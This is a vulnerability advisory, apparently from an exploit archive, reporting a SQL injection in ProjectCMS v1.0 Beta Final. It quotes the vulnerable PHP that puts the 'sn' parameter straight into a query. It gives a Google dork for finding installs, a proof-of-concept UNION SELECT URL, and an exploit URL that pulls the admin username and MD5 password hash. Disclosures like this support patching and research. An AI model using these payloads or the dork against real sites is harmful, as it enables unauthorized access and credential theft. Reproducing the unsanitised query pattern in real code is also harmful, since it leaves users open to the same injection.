ProjectCMS v1.0 Beta Final SQL Injection

2009.05.02
Credit: YEnH4ckEr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

-------------------------------------------------------------------- SQL INJECTION (SQLi) VULNERABILITY--ProjectCMS v1.0 Beta Final--> -------------------------------------------------------------------- CMS INFORMATION: -->WEB: http://projectcms.org/ -->DOWNLOAD: http://projectcms.org/uploads/projectcms_1.0_BETA.zip -->DEMO: http://projectcms.org -->CATEGORY: CMS / Portal -->DESCRIPTION: ProjectCMS is an open source community project to create a simple content management system with an easy to follow install... -->RELEASED: 2009-04-29 CMS VULNERABILITY: -->TESTED ON: firefox 3 -->DORK: "Powered by ProjectCMS" -->CATEGORY: SQL INJECTION VULNERABILITY -->AFFECT VERSION: 1.0 Beta Final (maybe <= ?) -->Discovered Bug date: 2009-04-29 -->Reported Bug date: 2009-04-29 -->Fixed bug date: N/A -->Info patch: N/A -->Author: YEnH4ckEr -->mail: y3nh4ck3r[at]gmail[dot]com -->WEB/BLOG: N/A -->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. -->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) ######################### //////////////////////// SQL INJECTION (SQLi): //////////////////////// ######################### <<<<---------++++++++++++++ Condition: magic_quotes_gpc=off +++++++++++++++++--------->>>> ----------- VULN FILE: ----------- ... $sn=$_GET["sn"]; if ( $sn == "" ) { $sn = "1"; } $sql="select sn,pagename,linktext,pagecontent,metakeywords,metadescription from $content where sn='$sn'"; $result=mysql_query($sql,$connection) or die(mysql_error()); ... ------------------ PROOF OF CONCEPT: ------------------ http://[HOST]/[HOME_PATH]/index.php?sn=1%27+AND+0+UNION+ALL+SELECT+1,database(),3,user(),5,6/* Return --> user and database, this last in title ;) ---------- EXPLOIT: ---------- http://[HOST]/[HOME_PATH]/index.php?sn=1%27+AND+0+UNION+ALL+SELECT+1,database(),3,concat(username,0x3A3A3A,password),5,6+FROM+members+WHERE+memberid=1/* Return --> username:::password (md5 hash) of admin and database (in title too). <<<-----------------------------EOF---------------------------------->>>ENJOY IT!

References:

http://seclists.org/bugtraq/2009/Apr/0287.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top